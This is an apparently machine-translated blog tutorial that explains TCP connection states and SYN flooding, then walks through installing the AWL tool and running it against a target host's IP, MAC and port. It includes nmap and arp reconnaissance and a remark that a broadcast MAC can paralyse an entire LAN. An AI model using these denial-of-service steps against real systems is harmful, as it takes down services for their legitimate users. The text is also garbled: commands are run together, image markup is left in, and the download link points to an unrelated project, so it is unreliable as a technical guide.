AWL multi-Process SYN attack

One, TCP connection state diagram

650) this.width=650; "src=" Https://s5.51cto.com/wyfs02/M01/8E/E0/wKioL1jOVEDxCvsVAAExl_xFLOM149.png "title=" 3.png "alt=" Wkiol1jovedxcvsvaaexl_xflom149.png "/>

The description is as follows:

server-side: LISTEN: Listening for connection requests from a remote TCP port

Client: syn-sent: Wait for a matching connection request after sending a connection request

Server-Side : syn-received: Waits for confirmation of a connection request after receiving and sending a connection request

Client /server side: established: Represents an open connection

Client: fin-wait-1: Waiting for a remote TCP connection interrupt request, or confirmation of a previous connection interrupt request

server-side: close-wait: Waiting for a connection interrupt request from a local user

Client: fin-wait-2: Waiting for connection interrupt request from remote TCP

server-side: Last-ack: Waiting for acknowledgement of the original connection interrupt request to the remote TCP

Client: time-wait: Wait enough time to ensure that the remote TCP receives a connection interrupt request acknowledgement

server-side: CLOSED: No connection Status

Ii. the process of SYN flood attack

After the server returns a confirmed Syn-ack packet, if the originating customer is a nonexistent client, then the server does not receive an ACK packet for the client response. At this point the server consumes a certain amount of system memory to wait for this pending connection until the wait timeout is closed before the memory can be cast. By IP spoofing, a malicious person sends a large number of SYN packets to the victim system, causing a large number of pending connections on the server and consuming large amounts of memory and TCP connections, resulting in the inability of normal clients to access the server

Third, use Awl to server implement SYN flood attack

1. Official website Https://gitlab.com/davical-project/awl/tags

2. Download the decompression installation

TAR-ZXVF awl-0.2.tar.gz

./configure--prefix=/usr/local/awl

Make -j 4

Make install

3. awl command format

awl-i eth0-m 00:0c:29:a9:f0:6c-d ip-p Port

Description

-I sends the interface of the package, if omitted the default is Eth0

- M is attacked the MAC address of the machine, the program can not get the Mac according to the attack IP, need to manually specify. Ping the target IP first, then arp-a. If omitted, FF:FF:FF:FF:FF:FF, Indicates that ARP broadcasts are issued to all hosts in the same network segment, SYN attacks are made, and the entire LAN is easily paralyzed

- d The IP of the attacked machine

- p Port of the attacked machine

4. Nmap View Object machine open ports and Mac

Nmap 192.168.1.123

or ping 192.168.1.123; Arp-n View Mac

650) this.width=650; "src=" Https://s5.51cto.com/wyfs02/M02/8E/E2/wKiom1jOVfqi3OpGAAAue6ybz68707.png "title=" 4.4. PNG "alt=" Wkiom1jovfqi3opgaaaue6ybz68707.png "/>650) this.width=650; src="/e/u261/themes/default/images/ Spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/images/localimage.png") no-repeat center;border:1px solid # DDD; "alt=" Spacer.gif "/>

5. Testing

/usr/local/awl/bin/awl-i eth0-m 00:0c:29:a9:f0:6c-d 192.168.1.123-p 80

650) this.width=650; "src=" Https://s3.51cto.com/wyfs02/M00/8E/E0/wKioL1jOVdfSnCjmAAApn9P2_Wk177.png "title=" 4.5. PNG "alt=" Wkiol1jovdfsncjmaaapn9p2_wk177.png "/>650) this.width=650; src="/e/u261/themes/default/images/ Spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/images/localimage.png") no-repeat center;border:1px solid # DDD; "alt=" Spacer.gif "/>

Netstat-antup|grep 80

650) this.width=650; "src="/e/u261/themes/default/images/spacer.gif "style=" Background:url ("/e/u261/lang/zh-cn/ Images/localimage.png ") no-repeat center;border:1px solid #ddd;" alt= "spacer.gif"/> 650) this.width=650; "Src=" Https://s2.51cto.com/wyfs02/M00/8E/E2/wKiom1jOVcGCt8cxAAAa0pd12g4065.png "title=" 4.51.png "alt=" Wkiom1jovcgct8cxaaaa0pd12g4065.png "/>

This article is from "A horse on the Plains" blog, please be sure to keep this source http://huangzp.blog.51cto.com/12434999/1908170

AWL multi-Process SYN attack